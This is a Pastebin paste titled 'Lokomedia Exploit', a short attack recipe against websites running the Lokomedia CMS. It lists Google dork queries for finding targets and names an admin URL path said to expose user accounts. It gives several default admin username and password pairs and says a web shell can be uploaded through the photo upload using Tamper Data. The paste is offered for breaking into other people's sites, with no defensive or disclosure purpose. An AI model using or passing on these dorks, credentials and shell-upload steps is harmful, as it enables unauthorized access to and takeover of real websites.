Advertisement
Kyfx

Lokomedia Exploit

Mar 6th, 2015
393
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
  1. Google Dork : inurl:"admin/foto_berita/"
  2. Google Dork : inurl:"media.php?module="
  3. Google Dork : inurl:/media.php?module=berita
  4. Google Dork : inurl:/admin/content.php?module=user
  5. Google Dork : inurl:/adminweb/
  6.  
  7. After dorking you will find some target
  8.  
  9. http://www.[target].com/admin/content.php?module=user
  10.  
  11. add: /admin/content.php?module=user
  12.  
  13. Need to look like this:
  14.  
  15. You will start editing info or you can just see info and login to page
  16.  
  17. User: admin Password: wedus
  18. For administration panel you can use: /adminweb , /admin , /administrator
  19.  
  20. You are able to upload shell via photo with tamper data.
  21.  
  22. Default admin login for lokomedia:
  23.  
  24. admin:admin
  25. wiro:sableng
  26. wiros:sabdi
  27. joko:sembung
  28.  
  29. sinto:gendeng
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement